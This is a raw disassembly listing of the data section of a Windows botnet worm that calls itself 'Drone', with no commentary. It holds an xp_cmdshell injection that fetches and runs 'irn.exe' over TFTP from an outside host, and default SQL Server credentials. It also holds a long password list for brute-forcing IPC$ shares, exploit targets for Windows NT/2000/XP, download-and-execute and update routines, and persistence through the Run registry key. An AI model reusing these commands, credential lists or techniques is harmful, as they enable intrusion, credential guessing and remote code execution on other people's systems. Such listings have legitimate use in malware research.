dd offset asc_41EA90 ; "--"
dd offset asc_41EA8C ; "-"
dd offset asc_41EA88 ; "+"
dd offset asc_41EA84 ; "&"
dd offset asc_41EA80 ; "->*"
dd offset asc_41EA7C ; "/"
dd offset asc_41EA78 ; "%"
dd offset asc_41EA74 ; "<"
dd offset asc_41EA70 ; "<="
dd offset asc_41EA6C ; ">"
dd offset asc_41EA68 ; ">="
dd offset asc_41EA64 ; ","
dd offset asc_41EA60 ; "()"
dd offset asc_41EA5C ; "~"
dd offset asc_41EA58 ; "^"
dd offset asc_41EA54 ; "|"
dd offset asc_41EA50 ; "&&"
dd offset asc_41EA4C ; "||"
dd offset asc_41EA48 ; "*="
dd offset asc_41EA44 ; "+="
dd offset asc_41EA40 ; "-="
dd offset asc_41EA3C ; "/="
dd offset asc_41EA38 ; "%="
dd offset asc_41EA34 ; ">>="
dd offset asc_41EA30 ; "<<="
dd offset asc_41EA2C ; "&="
dd offset asc_41EA28 ; "|="
dd offset asc_41EA24 ; "^="
dd offset aVftable ; "`vftable'"
dd offset aVbtable ; "`vbtable'"
dd offset aVcall ; "`vcall'"
dd offset aTypeof ; "`typeof'"
dd offset aLocalStaticGua ; "`local static guard'"
dd offset aString ; "`string'"
dd offset aVbaseDestructo ; "`vbase destructor'"
dd offset aVectorDeleting ; "`vector deleting destructor'"
dd offset aDefaultConstru ; "`default constructor closure'"
dd offset aScalarDeleting ; "`scalar deleting destructor'"
dd offset aVectorConstruc ; "`vector constructor iterator'"
dd offset aVectorDestruct ; "`vector destructor iterator'"
dd offset aVectorVbaseCon ; "`vector vbase constructor iterator'"
dd offset aVirtualDisplac ; "`virtual displacement map'"
dd offset aEhVectorConstr ; "`eh vector constructor iterator'"
dd offset aEhVectorDestru ; "`eh vector destructor iterator'"
dd offset aEhVectorVbas_0 ; "`eh vector vbase constructor iterator'"
dd offset aCopyConstructo ; "`copy constructor closure'"
dd offset aUdtReturning ; "`udt returning'"
dd offset aEh ; "`EH"
dd offset aRtti ; "`RTTI"
dd offset aLocalVftable ; "`local vftable'"
dd offset aLocalVftableCo ; "`local vftable constructor closure'"
dd offset aNew ; " new[]"
dd offset aDelete ; " delete[]"
dd offset aOmniCallsig ; "`omni callsig'"
dd offset aPlacementDel_0 ; "`placement delete closure'"
dd offset aPlacementDelet ; "`placement delete[] closure'"
dd offset aManagedVecto_0 ; "`managed vector constructor iterator'"
dd offset aManagedVectorD ; "`managed vector destructor iterator'"
dd offset aEhVectorCopyCo ; "`eh vector copy constructor iterator'"
dd offset aEhVectorVbaseC ; "`eh vector vbase copy constructor itera"...
dd offset aDynamicInitial ; "`dynamic initializer for '"
dd offset aDynamicAtexitD ; "`dynamic atexit destructor for '"
dd offset aVectorCopyCons ; "`vector copy constructor iterator'"
dd offset aVectorVbaseCop ; "`vector vbase copy constructor iterator"...
dd offset aManagedVectorC ; "`managed vector copy constructor iterat"...
dd offset aLocalStaticThr ; "`local static thread guard'"
dd offset word_41D482
dd 86808006h, 808180h, 86031000h, 80828680h, 45050514h
dd 85854545h, 585h, 50803030h, 8008880h, 38272800h, 805750h
dd 30370007h, 88505030h, 20000000h, 80888028h, 80h
aHHhhXppwpp db '`h`hhh',8,8,7,'xppwpp',8,8,0
dw 800h
dd 7000800h, 8
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_40F524+C1�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_40F524+A9�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_40F524+6D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_40F524+58�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_40F524+46�o
aUser32_dll_0 db 'USER32.DLL',0 ; DATA XREF: sub_40F524+28�o
align 4
off_41ED94 dd offset sub_40F76B ; DATA XREF: sub_407979�r sub_407979+9�o ...
dd offset nullsub_2
dd offset nullsub_2
a_nextafter db '_nextafter',0
align 4
a_logb db '_logb',0
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 10h
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 10h
aLdexp db 'ldexp',0
align 4
aFabs db 'fabs',0
align 10h
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
dbl_41EE18 dq 0.0 ; DATA XREF: sub_40FB20+143�r
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 10h
aE000 db 'e+000',0 ; DATA XREF: sub_410A54:loc_410B2C�o
align 4
dbl_41EE68 dq 4.195835e6 ; DATA XREF: sub_411394+F�r
dbl_41EE70 dq 3.145727e6 ; DATA XREF: sub_411394+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_4113D0+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_4113D0�o
align 10h
aConout db 'CONOUT$',0 ; DATA XREF: sub_41142B+E�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_412AB1:loc_412BE0�o
align 10h
a1Inf db '1#INF',0 ; DATA XREF: sub_412AB1+103�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_412AB1+F4�o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: sub_412AB1+DC�o
align 4
aBadAllocation db 'bad allocation',0 ; DATA XREF: seg002:00424520�o
align 4
aScan_start db 'scan.start',0 ; DATA XREF: seg000:0041C445�o
align 4
aScan_stop db 'scan.stop',0 ; DATA XREF: seg000:0041C461�o
byte_41EEEE db 0 ; DATA XREF: sub_41A9DE+9C�o
byte_41EEEF db 0 ; DATA XREF: sub_41A9DE+A8�o
dword_41EEF0 dd 6E616373h, 6174732Eh, 7374h ; DATA XREF: seg000:0041C47D�o
dword_41EEFC dd 252E6425h, 64252E64h, 64252Eh ; DATA XREF: seg000:00413A77�o
byte_41EF08 db 25h, 73h, 0 ; DATA XREF: seg000:00413BB9�o
byte_41EF0B db 0 ; DATA XREF: seg002:off_424650�o
byte_41EF0C db 25h, 73h, 0 ; DATA XREF: seg000:00413CC9�o
byte_41EF0F db 0 ; DATA XREF: seg000:0041BB02�o
dword_41EF10 dd 7325h ; DATA XREF: seg000:00413DB3�o
byte_41EF14 db 25h, 73h, 0 ; DATA XREF: seg000:00413EC2�o
byte_41EF17 db 0 ; DATA XREF: seg000:loc_41C061�o
dword_41EF18 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh ; DATA XREF: seg002:00424524�o
aTftpISGetIrn_e db 'tftp -i %s GET irn.exe&start irn.exe&exit',0Dh,0Ah,0
aBadAllocatio_0 db 'bad allocation',0 ; DATA XREF: seg002:004245D8�o
align 4
dword_41EF64 dd 5C0D0A00h ; DATA XREF: sub_41A5C1+1F�r
dword_41EF68 dd 2E2F5Fh ; DATA XREF: sub_41A5C1+27�r
dword_41EF6C dd 0 ; DATA XREF: sub_41A5C1+2C�o
dword_41EF70 dd 0 ; DATA XREF: sub_41A5C1+51�o
aHttpSDS db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A5C1+F1�o
aHttpSDS_0 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A5C1+162�o
aBadAllocatio_1 db 'bad allocation',0
align 4
aWindowsNt42000 db 'Windows NT4, 2000 (SP0-SP4)',0
aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: seg002:00424634�o
align 4
aIpc:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
dd 2 dup(0)
aIpc_0:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
a_: ; DATA XREF: sub_41A9DE+57�o
unicode 0, <.>,0
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_41A9DE+76�o
align 4
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_41A9DE+CA�o
align 4
dword_41F02C dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_41A9DE+191�o
dword_41F040 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 3 dup(0)
; DATA XREF: sub_41A9DE+1AC�o
dd 2EBh, 0
aHttpSDS_1 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A9DE+3D3�o
aHttpSDS_2 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A9DE+451�o
aSExploitedS_ db '%s: Exploited: %s.',0 ; DATA XREF: sub_41A9DE+786�o
align 4
aBadAllocatio_2 db 'bad allocation',0 ; DATA XREF: seg002:00424648�o
align 4
aSa db 'sa',0 ; DATA XREF: sub_41B1A0+55�o
align 4
aRoot db 'root',0 ; DATA XREF: sub_41B1A0+5C�o
align 4
aAdmin db 'admin',0 ; DATA XREF: sub_41B1A0+63�o
align 4
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: sub_41B1A0+10C�o
align 10h
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET irn.exe&start irn.exe'
; DATA XREF: sub_41B1A0+197�o
db '&exit',0Dh,0Ah
db 27h,0
align 4
aSExploitedS__0 db '%s: Exploited %s.',0 ; DATA XREF: sub_41B1A0+1F1�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: seg002:00424654�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: seg002:00424658�o
align 4
aAdministrateur db 'administrateur',0 ; DATA XREF: seg002:0042465C�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: seg002:00424660�o
aAdmins db 'admins',0 ; DATA XREF: seg002:00424664�o
align 10h
aAdmin_0 db 'admin',0 ; DATA XREF: seg002:00424668�o
align 4
aAdm db 'adm',0 ; DATA XREF: seg002:0042466C�o
aPassword1 db 'password1',0 ; DATA XREF: seg002:00424670�o
align 4
aPassword db 'password',0 ; DATA XREF: seg002:00424674�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: seg002:00424678�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: seg002:0042467C�o
align 4
aPass db 'pass',0 ; DATA XREF: seg002:00424680�o
align 10h
aPwd db 'pwd',0 ; DATA XREF: seg002:00424684�o
a007 db '007',0 ; DATA XREF: seg002:00424688�o
a1: ; DATA XREF: seg002:0042468C�o
unicode 0, <1>,0
a12 db '12',0 ; DATA XREF: seg002:00424690�o
align 10h
a123 db '123',0 ; DATA XREF: seg002:00424694�o
a1234 db '1234',0 ; DATA XREF: seg002:00424698�o
align 4
a12345 db '12345',0 ; DATA XREF: seg002:0042469C�o
align 4
a123456 db '123456',0 ; DATA XREF: seg002:004246A0�o
align 4
a1234567 db '1234567',0 ; DATA XREF: seg002:004246A4�o
a12345678 db '12345678',0 ; DATA XREF: seg002:004246A8�o
align 10h
a123456789 db '123456789',0 ; DATA XREF: seg002:004246AC�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: seg002:004246B0�o
align 4
a2000 db '2000',0 ; DATA XREF: seg002:004246B4�o
align 10h
a2001 db '2001',0 ; DATA XREF: seg002:004246B8�o
align 4
a2002 db '2002',0 ; DATA XREF: seg002:004246BC�o
align 10h
a2003 db '2003',0 ; DATA XREF: seg002:004246C0�o
align 4
a2004 db '2004',0 ; DATA XREF: seg002:004246C4�o
align 10h
aTest db 'test',0 ; DATA XREF: seg002:004246C8�o
align 4
aGuest db 'guest',0 ; DATA XREF: seg002:004246CC�o
align 10h
aNone db 'none',0 ; DATA XREF: seg002:004246D0�o
align 4
aDemo db 'demo',0 ; DATA XREF: seg002:004246D4�o
align 10h
aUnix db 'unix',0 ; DATA XREF: seg002:004246D8�o
align 4
aLinux db 'linux',0 ; DATA XREF: seg002:004246DC�o
align 10h
aChangeme db 'changeme',0 ; DATA XREF: seg002:004246E0�o
align 4
aDefault db 'default',0 ; DATA XREF: seg002:004246E4�o
aSystem_0 db 'system',0 ; DATA XREF: seg002:004246E8�o
align 4
aServer db 'server',0 ; DATA XREF: seg002:004246EC�o
align 4
aRoot_0 db 'root',0 ; DATA XREF: seg002:004246F0�o
align 4
aNull_1 db 'null',0 ; DATA XREF: seg002:004246F4�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: seg002:004246F8�o
align 4
aMail db 'mail',0 ; DATA XREF: seg002:004246FC�o
align 4
aOutlook db 'outlook',0 ; DATA XREF: seg002:00424700�o
aWeb db 'web',0 ; DATA XREF: seg002:00424704�o
aWww db 'www',0 ; DATA XREF: seg002:00424708�o
aInternet db 'internet',0 ; DATA XREF: seg002:0042470C�o
align 10h
aAccounts db 'accounts',0 ; DATA XREF: seg002:00424710�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: seg002:00424714�o
align 4
aHome db 'home',0 ; DATA XREF: seg002:00424718�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: seg002:0042471C�o
align 4
aUser db 'user',0 ; DATA XREF: seg002:00424720�o
align 4
aOem db 'oem',0 ; DATA XREF: seg002:00424724�o
aOemuser db 'oemuser',0 ; DATA XREF: seg002:00424728�o
aOeminstall db 'oeminstall',0 ; DATA XREF: seg002:0042472C�o
align 4
aWindows db 'windows',0 ; DATA XREF: seg002:00424730�o
aWin98 db 'win98',0 ; DATA XREF: seg002:00424734�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: seg002:00424738�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: seg002:0042473C�o
align 4
aWinnt db 'winnt',0 ; DATA XREF: seg002:00424740�o
align 4
aWin2000 db 'win2000',0 ; DATA XREF: seg002:00424744�o
aQaz db 'qaz',0 ; DATA XREF: seg002:00424748�o
aAsd db 'asd',0 ; DATA XREF: seg002:0042474C�o
aZxc db 'zxc',0 ; DATA XREF: seg002:00424750�o
aQwe db 'qwe',0 ; DATA XREF: seg002:00424754�o
aBob db 'bob',0 ; DATA XREF: seg002:00424758�o
aJen db 'jen',0 ; DATA XREF: seg002:0042475C�o
aJoe db 'joe',0 ; DATA XREF: seg002:00424760�o
aFred db 'fred',0 ; DATA XREF: seg002:00424764�o
align 10h
aBill db 'bill',0 ; DATA XREF: seg002:00424768�o
align 4
aMike db 'mike',0 ; DATA XREF: seg002:0042476C�o
align 10h
aJohn db 'john',0 ; DATA XREF: seg002:00424770�o
align 4
aPeter db 'peter',0 ; DATA XREF: seg002:00424774�o
align 10h
aLuke db 'luke',0 ; DATA XREF: seg002:00424778�o
align 4
aSam db 'sam',0 ; DATA XREF: seg002:0042477C�o
aSue db 'sue',0 ; DATA XREF: seg002:00424780�o
aSusan db 'susan',0 ; DATA XREF: seg002:00424784�o
align 4
aPeter_0 db 'peter',0 ; DATA XREF: seg002:00424788�o
align 10h
aBrian db 'brian',0 ; DATA XREF: seg002:0042478C�o
align 4
aLee db 'lee',0 ; DATA XREF: seg002:00424790�o
aNeil db 'neil',0 ; DATA XREF: seg002:00424794�o
align 4
aIan db 'ian',0 ; DATA XREF: seg002:00424798�o
aChris db 'chris',0 ; DATA XREF: seg002:0042479C�o
align 10h
aEric db 'eric',0 ; DATA XREF: seg002:004247A0�o
align 4
aGeorge db 'george',0 ; DATA XREF: seg002:004247A4�o
align 10h
aKate db 'kate',0 ; DATA XREF: seg002:004247A8�o
align 4
aBob_0 db 'bob',0 ; DATA XREF: seg002:004247AC�o
aKatie db 'katie',0 ; DATA XREF: seg002:004247B0�o
align 4
aMary db 'mary',0 ; DATA XREF: seg002:004247B4�o
align 4
aLogin db 'login',0 ; DATA XREF: seg002:004247B8�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: seg002:004247BC�o
align 10h
aTechnical db 'technical',0 ; DATA XREF: seg002:004247C0�o
align 4
aBackup db 'backup',0 ; DATA XREF: seg002:004247C4�o
align 4
aExchange db 'exchange',0 ; DATA XREF: seg002:004247C8�o
align 10h
aFuck db 'fuck',0 ; DATA XREF: seg002:004247CC�o
align 4
aBitch db 'bitch',0 ; DATA XREF: seg002:004247D0�o
align 10h
aSlut db 'slut',0 ; DATA XREF: seg002:004247D4�o
align 4
aSex db 'sex',0 ; DATA XREF: seg002:004247D8�o
aGod db 'god',0 ; DATA XREF: seg002:004247DC�o
aHell db 'hell',0 ; DATA XREF: seg002:004247E0�o
align 4
aHello db 'hello',0 ; DATA XREF: seg002:004247E4�o
align 10h
aDomain db 'domain',0 ; DATA XREF: seg002:004247E8�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: seg002:004247EC�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: seg002:004247F0�o
align 4
aDatabase db 'database',0 ; DATA XREF: seg002:004247F4�o
align 10h
aAccess db 'access',0 ; DATA XREF: seg002:004247F8�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: seg002:004247FC�o
align 10h
aDbpassword db 'dbpassword',0 ; DATA XREF: seg002:00424800�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: seg002:00424804�o
align 4
aData db 'data',0 ; DATA XREF: seg002:00424808�o
align 4
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: seg002:0042480C�o
align 4
aDb1 db 'db1',0 ; DATA XREF: seg002:00424810�o
aDb2 db 'db2',0 ; DATA XREF: seg002:00424814�o
aDb1234 db 'db1234',0 ; DATA XREF: seg002:00424818�o
align 4
aSa_0 db 'sa',0 ; DATA XREF: seg002:0042481C�o
align 4
aSql db 'sql',0 ; DATA XREF: seg002:00424820�o
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: seg002:00424824�o
align 4
aOrainstall db 'orainstall',0 ; DATA XREF: seg002:00424828�o
align 10h
aOracle db 'oracle',0 ; DATA XREF: seg002:0042482C�o
align 4
aIbm db 'ibm',0 ; DATA XREF: seg002:00424830�o
aCisco db 'cisco',0 ; DATA XREF: seg002:00424834�o
align 4
aDell db 'dell',0 ; DATA XREF: seg002:00424838�o
align 4
aCompaq db 'compaq',0 ; DATA XREF: seg002:0042483C�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: seg002:00424840�o
aHp db 'hp',0 ; DATA XREF: seg002:00424844�o
align 10h
aNokia db 'nokia',0 ; DATA XREF: seg002:00424848�o
align 4
aXp db 'xp',0 ; DATA XREF: seg002:0042484C�o
align 4
aControl db 'control',0 ; DATA XREF: seg002:00424850�o
aOffice db 'office',0 ; DATA XREF: seg002:00424854�o
align 4
aBlank db 'blank',0 ; DATA XREF: seg002:00424858�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: seg002:0042485C�o
aMain db 'main',0 ; DATA XREF: seg002:00424860�o
align 4
aLan db 'lan',0 ; DATA XREF: seg002:00424864�o
aInternet_0 db 'internet',0 ; DATA XREF: seg002:00424868�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: seg002:0042486C�o
align 10h
aStudent db 'student',0 ; DATA XREF: seg002:00424870�o
aTeacher db 'teacher',0 ; DATA XREF: seg002:00424874�o
aStaff db 'staff',0 ; DATA XREF: seg002:00424878�o
align 4
aBadAllocatio_3 db 'bad allocation',0 ; DATA XREF: seg002:0042464C�o
align 4
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_41A391+21�o
align 4
aMhz db '~MHz',0 ; DATA XREF: sub_41A391+4A�o
align 10h
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_41A391+6D�o
aS_7 db '%s',0 ; DATA XREF: sub_41A391+AD�o
align 4
aSC_0 db '%s%c',0 ; DATA XREF: sub_41A391+112�o
align 10h
aUnknown db 'Unknown',0 ; DATA XREF: sub_41A391+165�o
aHardwareDesc_0 db 'HARDWARE\DESCRIPTION\System\CentralProcessor\%i',0
; DATA XREF: sub_41A391+1B7�o
aSysinfo db 'sysinfo',0 ; DATA XREF: seg000:0041C3FF�o
aNetinfo db 'netinfo',0 ; DATA XREF: seg000:0041C41B�o
aBadAllocatio_4 db 'bad allocation',0 ; DATA XREF: seg002:00424880�o
align 4
aHttp db 'http',0 ; DATA XREF: seg000:0041C3E3�o
align 10h
aBadAllocatio_5 db 'bad allocation',0 ; DATA XREF: seg002:00424884�o
align 10h
aDl db 'DL',0
align 4
aDownload db 'download',0 ; DATA XREF: seg000:0041C3AB�o
align 10h
aUpdate db 'update',0 ; DATA XREF: seg000:0041C3C7�o
align 4
aMozilla5_0 db 'Mozilla/5.0',0 ; DATA XREF: seg000:0041B958�o
aDlDownloadingS db 'DL: Downloading %s to %s',0 ; DATA XREF: seg000:0041B976�o
align 10h
aDlFailedBadLoc db 'DL: Failed; Bad Location.',0 ; DATA XREF: seg000:loc_41BAEF�o
align 4
aDlDownloadSIBy db 'DL: Download %s (%i Bytes) finished in %i seconds (%iKB/s)',0
; DATA XREF: seg000:0041BA7B�o
align 4
aMainUninstalli db 'Main: Uninstalling Drone',0 ; DATA XREF: seg000:0041BACC�o
align 4
aDlFailedToUpda db 'DL: Failed To Update',0 ; DATA XREF: seg000:loc_41BAF6�o
align 4
aDlErrorExecuti db 'DL: Error Executing File.',0 ; DATA XREF: seg000:0041BB12�o
align 4
aDlExecutedFile db 'DL: Executed File: %s',0 ; DATA XREF: seg000:0041BB21�o
align 10h
aDlFailedBadUrl db 'DL: Failed; Bad URL',0 ; DATA XREF: seg000:loc_41BB3D�o
aDlFailedWinine db 'DL: Failed; WinINET Error',0 ; DATA XREF: seg000:loc_41BB44�o
align 10h
aBadAllocatio_6 db 'bad allocation',0 ; DATA XREF: seg002:00424888�o
align 10h
aBadAllocatio_7 db 'bad allocation',0 ; DATA XREF: seg002:0042488C�o
align 10h
aTftpServer db 'TFTP Server',0 ; DATA XREF: sub_41B775+5A�o
aRb db 'rb',0 ; DATA XREF: sub_41B3D0+44�o
align 10h
aTftpSendComple db 'TFTP: Send Complete To %s. %d Total Sends',0
; DATA XREF: sub_41B3D0+1A4�o
align 4
aBadAllocatio_8 db 'bad allocation',0 ; DATA XREF: seg002:00424890�o
align 10h
dd 428A2F98h, 71374491h, 0B5C0FBCFh, 0E9B5DBA5h, 3956C25Bh
dd 59F111F1h, 923F82A4h, 0AB1C5ED5h, 0D807AA98h, 12835B01h
dd 243185BEh, 550C7DC3h, 72BE5D74h, 80DEB1FEh, 9BDC06A7h
dd 0C19BF174h, 0E49B69C1h, 0EFBE4786h, 0FC19DC6h, 240CA1CCh
dd 2DE92C6Fh, 4A7484AAh, 5CB0A9DCh, 76F988DAh, 983E5152h
dd 0A831C66Dh, 0B00327C8h, 0BF597FC7h, 0C6E00BF3h, 0D5A79147h
dd 6CA6351h, 14292967h, 27B70A85h, 2E1B2138h, 4D2C6DFCh
dd 53380D13h, 650A7354h, 766A0ABBh, 81C2C92Eh, 92722C85h
dd 0A2BFE8A1h, 0A81A664Bh, 0C24B8B70h, 0C76C51A3h, 0D192E819h
dd 0D6990624h, 0F40E3585h, 106AA070h, 19A4C116h, 1E376C08h
dd 2748774Ch, 34B0BCB5h, 391C0CB3h, 4ED8AA4Ah, 5B9CCA4Fh
dd 682E6FF3h, 748F82EEh, 78A5636Fh, 84C87814h, 8CC70208h
dd 90BEFFFAh, 0A4506CEBh, 0BEF9A3F7h, 0C67178F2h, 6A09E667h
dd 0BB67AE85h, 3C6EF372h, 0A54FF53Ah, 510E527Fh, 9B05688Ch
dd 1F83D9ABh, 5BE0CD19h
dword_41F950 dd 0D728AE22h ; DATA XREF: sub_4143D0+318�r
dword_41F954 dd 428A2F98h ; DATA XREF: sub_4143D0+31F�r
dword_41F958 dd 23EF65CDh ; DATA XREF: sub_4143D0+548�r
dword_41F95C dd 71374491h ; DATA XREF: sub_4143D0+54F�r
dword_41F960 dd 0EC4D3B2Fh ; DATA XREF: sub_4143D0+772�r
dword_41F964 dd 0B5C0FBCFh ; DATA XREF: sub_4143D0+779�r
dword_41F968 dd 8189DBBCh ; DATA XREF: sub_4143D0+9B8�r
dword_41F96C dd 0E9B5DBA5h ; DATA XREF: sub_4143D0+9BF�r
dword_41F970 dd 0F348B538h ; DATA XREF: sub_4143D0+BFE�r
dword_41F974 dd 3956C25Bh ; DATA XREF: sub_4143D0+C09�r
dword_41F978 dd 0B605D019h ; DATA XREF: sub_4143D0+E80�r
dword_41F97C dd 59F111F1h ; DATA XREF: sub_4143D0+E87�r
dword_41F980 dd 0AF194F9Bh ; DATA XREF: sub_4143D0+10D7�r
dword_41F984 dd 923F82A4h ; DATA XREF: sub_4143D0+10DE�r
dword_41F988 dd 0DA6D8118h ; DATA XREF: sub_4143D0+1319�r
dword_41F98C dd 0AB1C5ED5h ; DATA XREF: sub_4143D0+1320�r
dword_41F990 dd 0A3030242h ; DATA XREF: sub_4143D0+1569�r
dword_41F994 dd 0D807AA98h ; DATA XREF: sub_4143D0+1570�r
dword_41F998 dd 45706FBEh ; DATA XREF: sub_4143D0+17AB�r
dword_41F99C dd 12835B01h ; DATA XREF: sub_4143D0+17B2�r
dword_41F9A0 dd 4EE4B28Ch ; DATA XREF: sub_4143D0+19F3�r
dword_41F9A4 dd 243185BEh ; DATA XREF: sub_4143D0+19FA�r
dword_41F9A8 dd 0D5FFB4E2h ; DATA XREF: sub_4143D0+1C39�r
dword_41F9AC dd 550C7DC3h ; DATA XREF: sub_4143D0+1C40�r
dword_41F9B0 dd 0F27B896Fh ; DATA XREF: sub_4143D0+1E91�r
dword_41F9B4 dd 72BE5D74h ; DATA XREF: sub_4143D0+1E9C�r
dword_41F9B8 dd 3B1696B1h ; DATA XREF: sub_4143D0+210D�r
dword_41F9BC dd 80DEB1FEh ; DATA XREF: sub_4143D0+2114�r
dword_41F9C0 dd 25C71235h ; DATA XREF: sub_4143D0+236A�r
dword_41F9C4 dd 9BDC06A7h ; DATA XREF: sub_4143D0+2371�r
dword_41F9C8 dd 0CF692694h ; DATA XREF: sub_4143D0+25B8�r
dword_41F9CC dd 0C19BF174h ; DATA XREF: sub_4143D0+25BF�r
dd 9EF14AD2h, 0E49B69C1h, 384F25E3h, 0EFBE4786h, 8B8CD5B5h
dd 0FC19DC6h, 77AC9C65h, 240CA1CCh, 592B0275h, 2DE92C6Fh
dd 6EA6E483h, 4A7484AAh, 0BD41FBD4h, 5CB0A9DCh, 831153B5h
dd 76F988DAh, 0EE66DFABh, 983E5152h, 2DB43210h, 0A831C66Dh
dd 98FB213Fh, 0B00327C8h, 0BEEF0EE4h, 0BF597FC7h, 3DA88FC2h
dd 0C6E00BF3h, 930AA725h, 0D5A79147h, 0E003826Fh, 6CA6351h
dd 0A0E6E70h, 14292967h, 46D22FFCh, 27B70A85h, 5C26C926h
dd 2E1B2138h, 5AC42AEDh, 4D2C6DFCh, 9D95B3DFh, 53380D13h
dd 8BAF63DEh, 650A7354h, 3C77B2A8h, 766A0ABBh, 47EDAEE6h
dd 81C2C92Eh, 1482353Bh, 92722C85h, 4CF10364h, 0A2BFE8A1h
dd 0BC423001h, 0A81A664Bh, 0D0F89791h, 0C24B8B70h, 654BE30h
dd 0C76C51A3h, 0D6EF5218h, 0D192E819h, 5565A910h, 0D6990624h
dd 5771202Ah, 0F40E3585h, 32BBD1B8h, 106AA070h, 0B8D2D0C8h
dd 19A4C116h, 5141AB53h, 1E376C08h, 0DF8EEB99h, 2748774Ch
dd 0E19B48A8h, 34B0BCB5h, 0C5C95A63h, 391C0CB3h, 0E3418ACBh
dd 4ED8AA4Ah, 7763E373h, 5B9CCA4Fh, 0D6B2B8A3h, 682E6FF3h
dd 5DEFB2FCh, 748F82EEh, 43172F60h, 78A5636Fh, 0A1F0AB72h
dd 84C87814h, 1A6439ECh, 8CC70208h, 23631E28h, 90BEFFFAh
dd 0DE82BDE9h, 0A4506CEBh, 0B2C67915h, 0BEF9A3F7h, 0E372532Bh
dd 0C67178F2h, 0EA26619Ch, 0CA273ECEh, 21C0C207h, 0D186B8C7h
dd 0CDE0EB1Eh, 0EADA7DD6h, 0EE6ED178h, 0F57D4F7Fh, 72176FBAh
dd 6F067AAh, 0A2C898A6h, 0A637DC5h, 0BEF90DAEh, 113F9804h
dd 131C471Bh, 1B710B35h, 23047D84h, 28DB77F5h, 40C72493h
dd 32CAAB7Bh, 15C9BEBCh, 3C9EBE0Ah, 9C100D4Ch, 431D67C4h
dd 0CB3E42B6h, 4CC5D4BEh, 0FC657E2Ah, 597F299Ch, 3AD6FAECh
dd 5FCB6FABh, 4A475817h, 6C44198Ch, 0C1059ED8h, 0CBBB9D5Dh
dd 367CD507h, 629A292Ah, 3070DD17h, 9159015Ah, 0F70E5939h
dd 152FECD8h, 0FFC00B31h, 67332667h, 68581511h, 8EB44A87h
dd 64F98FA7h, 0DB0C2E0Dh, 0BEFA4FA4h, 47B5481Dh, 90h dup(0)
dword_41FE50 dd 0F3BCC908h, 6A09E667h, 84CAA73Bh, 0BB67AE85h, 0FE94F82Bh
; DATA XREF: sub_4143A0+17�o
dd 3C6EF372h, 5F1D36F1h, 0A54FF53Ah, 0ADE682D1h, 510E527Fh
dd 2B3E6C1Fh, 9B05688Ch, 0FB41BD6Bh, 1F83D9ABh, 137E2179h
dd 5BE0CD19h, 90h dup(0)
dword_4200D0 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
dd 69746163h, 6E6Fh
dword_4200F0 dd 255C7325h, 73h ; DATA XREF: sub_416F86+DC�o
aSoftwareMicr_6 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_416F86+10C�o
align 4
aSoftwareMicr_7 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_416F86+14F�o
align 4
